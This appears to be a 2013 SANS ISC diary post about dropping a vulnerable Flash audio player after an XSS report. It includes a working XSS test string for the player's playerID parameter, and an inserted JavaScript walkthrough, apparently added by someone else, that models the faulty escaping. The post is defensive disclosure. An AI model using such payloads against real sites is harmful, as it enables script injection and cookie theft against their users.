
SANS ISC: "De Flashing" the ISC Web Site and Flash XSS issues InfoSec Handlers Diary Blog


"De Flashing" the ISC Web Site and Flash XSS issues

Published: 2013-05-08
Last Updated: 2013-05-08 19:14:59 UTC
by Johannes Ullrich (Version: 1)

You may have noticed that earlier today I removed the Flash player we used to play audio files on our site. The trigger was a report that the particular Flash player we used (an open source player usually used with WordPress) is susceptible to cross-site scripting [1][2]. Instead of upgrading to the newer (patched) version, we decided to remove the player altogether.

The other part of this is that pretty much all current browsers have reasonable support for HTML5 audio tags. We offer our audio files, like the daily podcast, in MP3 as well as Ogg Vorbis format, which between them cover all major browsers. We also offer links to the direct files in case someone would like to play them "offline", and our RSS feeds work with various MP3/podcast players.

So in short, the flash player wasn't worth maintaining. 

On the other hand, we will try to embrace more of the HTML5 features as we move the site forward. The data will still be available in pretty much any browser (yup... lynx), but you will see our graphs and similar parts of the site take advantage of newer browser features to make it easier to navigate the data. For now, we still have a couple of Flash movies on the site, but we are working on moving them either to YouTube or to our own (again HTML5-based) solution.

Big thanks to Rafay Baloch [3] for reporting the XSS vulnerability to us! 

Example exploit string to test your own player (remove the spaces, but keep the // at the end):

player.swf ? playerID= \\%22))} catch(e){alert('Your%20cookies%20are%20mine%20now')} //
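To show why that string works, here is an added example (mine, not code from the ISC site or from the player's source). It models the JavaScript that the Flash plugin assembles for an ExternalInterface.call() and evaluates in the hosting page: the callback name is wrapped in a try/catch, and the argument is dropped into a double-quoted string literal with only the quote character escaped, so a backslash followed by a quote slips out of the literal. The callback name "AudioPlayer.loaded", the exact wrapper text, and the reading of the payload's leading \\%22 as one backslash followed by a double quote are assumptions for illustration. The script is run with no page-level callback defined, which is what happens when you load player.swf directly as the diary suggests: the callback throws, the attacker's catch block runs, and the trailing // comments out the plugin's own catch.

```javascript
// Added example, not the player's own code. Models Flash's ExternalInterface
// string building to show how the playerID payload becomes script execution.
// ASSUMED: the escaping rule (quotes escaped, backslashes not), the wrapper
// text, and the callback name "AudioPlayer.loaded".

// Constructed test URL, as decoded from the diary's exploit string
// (spaces removed, \\%22 taken to be one backslash followed by %22).
const testUrl =
  "player.swf?playerID=\\%22))}catch(e){alert('Your%20cookies%20are%20mine%20now')}//";

// Pull the playerID query parameter out of the URL and percent-decode it.
function playerIdFromUrl(url) {
  const query = url.slice(url.indexOf('?') + 1);
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key === 'playerID') return decodeURIComponent(pair.slice(eq + 1));
  }
  return null;
}

// Flash-style escaping (modelled): only the double quote gets a backslash,
// so an input of \" comes out as \\" and the quote terminates the literal.
function flashEscape(value) {
  return value.replace(/"/g, '\\"');
}

// Correct escaping for a JS string literal: escape backslashes first, then quotes.
function safeEscape(value) {
  return value.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// Shape of the wrapper the plugin evaluates in the page (modelled).
function buildCallbackScript(callbackName, argument, escapeFn) {
  return 'try { __flash__toXML(' + callbackName + '("' + escapeFn(argument) +
         '")) ; } catch (e) { "<undefined/>"; }';
}

// Evaluate the generated script as the browser would when player.swf is loaded
// directly (no AudioPlayer object on the page). Records every alert() call.
function runCallbackScript(script) {
  const alerts = [];
  try {
    const sandbox = new Function('alert', '__flash__toXML', script);
    sandbox(msg => alerts.push(String(msg)), x => '<string>' + x + '</string>');
  } catch (e) {
    // A syntax error, or an exception the wrapper did not catch, ends up here.
    alerts.push('ERROR:' + e.name);
  }
  return alerts;
}

// Run the diary's payload through the vulnerable and the corrected escaping.
function demonstrate(escapeFn) {
  const playerId = playerIdFromUrl(testUrl);
  return runCallbackScript(buildCallbackScript('AudioPlayer.loaded', playerId, escapeFn));
}

console.log('flashEscape:', demonstrate(flashEscape)); // payload's catch block runs
console.log('safeEscape: ', demonstrate(safeEscape));  // payload stays inside the string
```

With flashEscape the generated script reads try { __flash__toXML(AudioPlayer.loaded("\\"))}catch(e){alert('...')}// followed by the plugin's own catch, which is now a comment; the undefined callback throws and the attacker's catch fires. With safeEscape the same input stays a harmless string argument. The fix for a real player is the one the diary chose, upgrade or remove, since the escaping lives in the plugin, not in your page.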

[3] twitter @rafaybaloch

Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords: adobe flash xss